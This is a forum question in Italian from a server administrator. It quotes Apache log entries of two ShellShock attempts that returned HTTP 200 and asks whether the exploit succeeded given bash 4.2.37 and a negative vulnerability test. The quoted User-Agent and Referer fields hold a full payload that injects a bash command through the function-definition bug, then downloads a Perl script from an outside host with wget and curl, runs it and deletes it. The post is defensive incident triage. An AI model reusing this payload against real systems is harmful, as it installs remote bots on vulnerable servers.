Guardando attraverso i registri del mio server web, ho notato due diversi attacchi ShellShock sul mio server, che hanno entrambi generato un codice di risposta HTTP 200 OK. Assomigliano a questo (indirizzo IP / data e ora redatte):
223.252.35.159 - - [************] "GET / HTTP/1.1" 200 2203 "() { :;}; /bin/bash -c \"echo [IP_ADDRESS]/ ;cd /var/tmp; wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den; echo \"" "() { :;}; /bin/bash -c \"echo [IP_ADDRESS]/ ;cd /var/tmp; wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den; echo \""
La mia versione di bash è la 4.2.37 e aggiorniamo regolarmente questo server tramite apt-get update && apt-get dist-upgrade
insieme all'analisi del file di registro giornaliero. Si sta utilizzando Apache 2.2.22 e solo la porta 80 è aperta. Il file scaricato sembra essere uno script IRC che posso solo immaginare è utilizzato per scopi di flooding in questo contesto.
Cercando di eseguire x='() { :;}; echo VULNERABLE' bash -c :
(da C'è un breve comando per verificare se il mio server è protetto contro il bug di shellshock? ) non restituisce nulla, ma l'esecuzione di ps -p $$
da un terminale SSH mostra una bash shell attualmente in uso.
La domanda è: è probabile che l'exploit abbia funzionato visto quanto sopra?